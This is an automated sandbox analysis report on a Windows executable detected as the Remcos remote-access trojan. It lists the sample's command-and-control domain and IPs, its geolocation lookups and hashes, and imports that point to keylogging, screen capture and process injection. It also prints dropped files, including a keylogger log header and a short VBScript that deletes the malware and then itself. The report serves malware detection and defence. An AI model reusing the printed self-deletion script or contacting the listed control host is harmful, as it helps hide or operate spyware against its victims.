Name | IP | Active | Malicious | Antivirus Detection | Reputation
sendfiletiahforem.duckdns.org | 85.60.29.68 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
sendfiletiahforem.duckdns.org | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gpT | xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp7 | xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | xi0TpAxHGMsm.exe | true | URL Reputation: phishing | unknown
http://geoplugin.net/json.gpI | xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpSystem32 | xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpN | xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp- | xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
85.60.29.68 | sendfiletiahforem.duckdns.org | Spain | 12479 | UNI2-ASES | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
General Information

Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1435635
Start date and time: 2024-05-03 00:35:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: xi0TpAxHGMsm.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@3/3@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 51
• Number of non-executed functions: 213
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: xi0TpAxHGMsm.exe
                        No simulations
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        85.60.29.68x6iIksiqNqad.exeGet hashmaliciousRemcosBrowse
                          xOg18pHQGOQK.exeGet hashmaliciousNjratBrowse
                            xOg18pHQGOQK.exeGet hashmaliciousNjratBrowse
                              178.237.33.50PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • geoplugin.net/json.gp
                              INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              GVV.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                              sendfiletiahforem.duckdns.org | x6iIksiqNqad.exe | malicious | Remcos | 85.60.29.68
                              sendfiletiahforem.duckdns.org | xOg18pHQGOQK.exe | malicious | Njrat | 85.60.29.68
                              sendfiletiahforem.duckdns.org | xOg18pHQGOQK.exe | malicious | Njrat | 85.60.29.68
                              geoplugin.net | PO-USC-22USC-KonchoCo.exe | malicious | GuLoader, Remcos | 178.237.33.50
                              geoplugin.net | REVISED NEW ORDER 7936-2024.vbs | malicious | Remcos, GuLoader | 178.237.33.50
                              geoplugin.net | INQUIRY#46789.xla.xlsx | malicious | Remcos | 178.237.33.50
                              geoplugin.net | Teklif talebi BAKVENTA-BAKUUsurpationens.cmd | malicious | GuLoader, Remcos | 178.237.33.50
                              geoplugin.net | GVV.exe | malicious | Remcos | 178.237.33.50
                              geoplugin.net | INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | 178.237.33.50
                              geoplugin.net | Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | 178.237.33.50
                              geoplugin.net | 202404294766578200.xlam.xlsx | malicious | Remcos | 178.237.33.50
                              geoplugin.net | PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta | malicious | GuLoader, Remcos | 178.237.33.50
                              geoplugin.net | nU7Z8sPyvf.rtf | malicious | Remcos | 178.237.33.50
                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                              UNI2-ASES | p67UidesWn.elf | malicious | Mirai | 188.78.234.101
                              UNI2-ASES | Gb5Zd5Ird3.elf | malicious | Mirai | 90.161.219.127
                              UNI2-ASES | L31owFeEHg.elf | malicious | Mirai | 37.11.67.166
                              UNI2-ASES | cvoBQP1Lxo.elf | malicious | Mirai | 95.19.23.99
                              UNI2-ASES | x6iIksiqNqad.exe | malicious | Remcos | 85.60.29.68
                              UNI2-ASES | sora.arm.elf | malicious | Mirai | 95.20.238.255
                              UNI2-ASES | xOg18pHQGOQK.exe | malicious | Njrat | 85.60.29.68
                              UNI2-ASES | xOg18pHQGOQK.exe | malicious | Njrat | 85.60.29.68
                              UNI2-ASES | gVPlpwuoVV.elf | malicious | Mirai | 90.172.70.110
                              UNI2-ASES | TsDTSDr8mU.elf | malicious | Mirai | 95.20.61.34
                              ATOM86-ASATOM86NL | PO-USC-22USC-KonchoCo.exe | malicious | GuLoader, Remcos | 178.237.33.50
                              ATOM86-ASATOM86NL | REVISED NEW ORDER 7936-2024.vbs | malicious | Remcos, GuLoader | 178.237.33.50
                              ATOM86-ASATOM86NL | INQUIRY#46789.xla.xlsx | malicious | Remcos | 178.237.33.50
                              ATOM86-ASATOM86NL | Teklif talebi BAKVENTA-BAKUUsurpationens.cmd | malicious | GuLoader, Remcos | 178.237.33.50
                              ATOM86-ASATOM86NL | GVV.exe | malicious | Remcos | 178.237.33.50
                              ATOM86-ASATOM86NL | INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | 178.237.33.50
                              ATOM86-ASATOM86NL | Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | 178.237.33.50
                              ATOM86-ASATOM86NL | 202404294766578200.xlam.xlsx | malicious | Remcos | 178.237.33.50
                              ATOM86-ASATOM86NL | PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta | malicious | GuLoader, Remcos | 178.237.33.50
                              ATOM86-ASATOM86NL | https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcff | malicious | Remcos | 178.237.33.50
                              No context
                              No context
                              Process:C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):144
                              Entropy (8bit):3.340563546555108
                              Encrypted:false
                              SSDEEP:3:rhlKlFelZlNQlbU5JWRal2Jl+7R0DAlBG45klovDl6v:6lsZ4ZU5YcIeeDAlOWAv
                              MD5:C9D9BC2305C360931D2409FF33919CFC
                              SHA1:B169F5C632260B0B94DC3212BDE72849271FAB37
                              SHA-256:7D5B18EE696110C03673566909BE986D060B3D6496D55B811A53D9D3B9FFE6FB
                              SHA-512:5BEC65D04AA580F02E89CD44D414199C6C475ED477F381FD0813D09E02D71E46820F6E71F3065092DAFE79D86D795C000866B640E50C9E6E139B3744E96FA9EF
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\Disk\Disk.dat, Author: Joe Security
                              Reputation:low
                              Preview:....[.2.0.2.4./.0.5./.0.3. .0.0.:.3.5.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                              Process:C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):965
                              Entropy (8bit):5.023626250399301
                              Encrypted:false
                              SSDEEP:12:tkeknd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7x:qPdRNuKyGX85jvXhNlT3/7AcV9Wro
                              MD5:1D705D315B7FECE2D6C13A47EFD128A7
                              SHA1:32114D761B27C27C3686DC835AAD5E05B6B5A6F3
                              SHA-256:52729AABEA95E5F9A1C211F9C952B6827328D2AA816B8138048F1691DD638023
                              SHA-512:28CDA3717CD460797BD65CD6FD9CF79C683DB45DA67D0C1C27C3CDEAFFCEA6541CA36F63BD10C66BC36DA74B1399B9B4AA0A4F0F205C4E1A630BD6886E501148
                              Malicious:false
                              Reputation:low
                              Preview:{. "geoplugin_request":"191.96.227.219",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                              Process:C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                              File Type:data
                              Category:modified
                              Size (bytes):492
                              Entropy (8bit):3.5058350384510923
                              Encrypted:false
                              SSDEEP:12:xQ4lA2++ugypjBQMPURXkXIM64Q3DMkXIM649Hz/0aimi:7a2+SDxgnQTMgn9Aait
                              MD5:14C94E5B500B3AD817095A0C220DE8D6
                              SHA1:D62BDA6BF60D5A2B65F759835FD1C9E31540E066
                              SHA-256:CD8F1A1F0FBF23F58BF9F804961628F030ED4439AAB69189EB8D913EB9A4B43F
                              SHA-512:616D63849D93B6F27D25C21CF6AA2A3E1C390EED5E12B53F334FD9F723B09CF93E4ACC3B38B3993E6FCFCAA4294682BE8BCB315DB0D2EC2707C6D91D0ED5A243
                              Malicious:false
                              Reputation:low
                              Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.D.e.s.k.t.o.p.\.x.i.0.T.p.A.x.H.G.M.s.m...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.D.e.s.k.t.o.p.\.x.i.0.T.p.A.x.H.G.M.s.m...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.597245068665957
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:xi0TpAxHGMsm.exe
                              File size:494'080 bytes
                              MD5:effe954da69f8377295e43c84e48bd77
                              SHA1:2cce76b35acab30714dcb56042808efbf05ae969
                              SHA256:950b538fcf4aa8021867bce803c551b098b1481fc9b468772efb81f51c4c1c8c
                              SHA512:280f3aba77d9815f4b2e81462a97751f399c4d73a07a5fb3812bb6594826a81fe5ac449cf53409f8d51b16a6e61b99162923a28c54a02171ce016935823448cc
                              SSDEEP:6144:+XIktXfM8Lv86r9uVWAa2je4Z5zl4hgDHQQs4NTQjoHFsAOZZsAX4cNe5Gv:+X7tPMK8ctGe4Dzl4h2QnuPs/Zsvcv
                              TLSH:68B49E01BAD1C072D57514300D3AF776EAB8BD2028364A7B73D61D5BFE31190B62AAB7
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..- ..~ ..~ ..~.f$~3..~.f&~...~.f'~>..~).Q~!..~.Z.~"..~....:..~.......~.......~).F~9..~ ..~...~....D..~..*~!..~....!..~Rich ..
                              Icon Hash:95694d05214c1b33
                              Entrypoint:0x4349ef
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x65631255 [Sun Nov 26 09:39:33 2023 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:8d5087ff5de35c3fbb9f212b47d63cad
                              Instruction
                              call 00007F1D94E95DFCh
                              jmp 00007F1D94E95813h
                              push ebp
                              mov ebp, esp
                              sub esp, 00000324h
                              push ebx
                              push esi
                              push 00000017h
                              call 00007F1D94EB8074h
                              test eax, eax
                              je 00007F1D94E95987h
                              mov ecx, dword ptr [ebp+08h]
                              int 29h
                              xor esi, esi
                              lea eax, dword ptr [ebp-00000324h]
                              push 000002CCh
                              push esi
                              push eax
                              mov dword ptr [00471D14h], esi
                              call 00007F1D94E97DE7h
                              add esp, 0Ch
                              mov dword ptr [ebp-00000274h], eax
                              mov dword ptr [ebp-00000278h], ecx
                              mov dword ptr [ebp-0000027Ch], edx
                              mov dword ptr [ebp-00000280h], ebx
                              mov dword ptr [ebp-00000284h], esi
                              mov dword ptr [ebp-00000288h], edi
                              mov word ptr [ebp-0000025Ch], ss
                              mov word ptr [ebp-00000268h], cs
                              mov word ptr [ebp-0000028Ch], ds
                              mov word ptr [ebp-00000290h], es
                              mov word ptr [ebp-00000294h], fs
                              mov word ptr [ebp-00000298h], gs
                              pushfd
                              pop dword ptr [ebp-00000264h]
                              mov eax, dword ptr [ebp+04h]
                              mov dword ptr [ebp-0000026Ch], eax
                              lea eax, dword ptr [ebp+04h]
                              mov dword ptr [ebp-00000260h], eax
                              mov dword ptr [ebp-00000324h], 00010001h
                              mov eax, dword ptr [eax-04h]
                              push 00000050h
                              mov dword ptr [ebp-00000270h], eax
                              lea eax, dword ptr [ebp-58h]
                              push esi
                              push eax
                              call 00007F1D94E97D5Eh
                              Programming Language:
                              • [C++] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6eea8 | 0x104 | .rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x79000 | 0x494c | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7e000 | 0x3bcc | .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6d340 | 0x38 | .rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x6d3d4 | 0x18 | .rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x6d378 | 0x40 | .rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x59000 | 0x4fc | .rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                              .text | 0x1000 | 0x57175 | 0x57200 | f959ed65f49a903603bc150bbb7292aa | False | 0.571329694225251 | data | 6.62552167894442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata | 0x59000 | 0x179b6 | 0x17a00 | da5a02830f9692f0e185ce6da657bd28 | False | 0.5005683697089947 | Zebra Metafile graphic (comment = \210\002\007) | 5.859352576268188 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data | 0x71000 | 0x5d44 | 0xe00 | fa1a169b9414830def88848af87110b5 | False | 0.22154017857142858 | data | 3.00580031855032 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .tls | 0x77000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .gfids | 0x78000 | 0x230 | 0x400 | 09e4699aa75951ab53e804fe4f9a3b6b | False | 0.3271484375 | data | 2.349075166240886 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc | 0x79000 | 0x494c | 0x4a00 | 07bcd974cd7d61767d21a39c72d97d46 | False | 0.2627217060810811 | data | 3.8348703072208528 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc | 0x7e000 | 0x3bcc | 0x3c00 | 0a6e61b09628beca43d4bf9604f65238 | False | 0.7639973958333334 | data | 6.718533933603825 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                              RT_ICON | 0x7918c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3421985815602837
                              RT_ICON | 0x795f4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.27704918032786885
                              RT_ICON | 0x79f7c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.23686679174484052
                              RT_ICON | 0x7b024 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.22977178423236513
                              RT_RCDATA | 0x7d5cc | 0x33d | OpenPGP Public Key | | | 1.0132689987937273
                              RT_GROUP_ICON | 0x7d90c | 0x3e | data | English | United States | 0.8064516129032258
                              DLL | Import
                              KERNEL32.dll | FindNextFileA, ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, UnmapViewOfFile, DuplicateHandle, CreateFileMappingW, MapViewOfFile, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, FindFirstFileA, FormatMessageA, FindNextVolumeW, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, GetFileSize, TerminateThread, GetLastError, CreateDirectoryW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, CreateMutexA, GetCurrentProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, SetConsoleOutputCP, TlsAlloc, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
                              USER32.dll | GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, GetMessageA, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CloseWindow, SendInput, EnumDisplaySettingsW, mouse_event, CreatePopupMenu, DispatchMessageA, TranslateMessage, TrackPopupMenu, DefWindowProcA, CreateWindowExA, GetIconInfo, GetSystemMetrics, AppendMenuA, RegisterClassExA, GetCursorPos, SetForegroundWindow, DrawIcon, SystemParametersInfoW
                              GDI32.dll | BitBlt, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteObject, CreateDCA, GetObjectA, DeleteDC
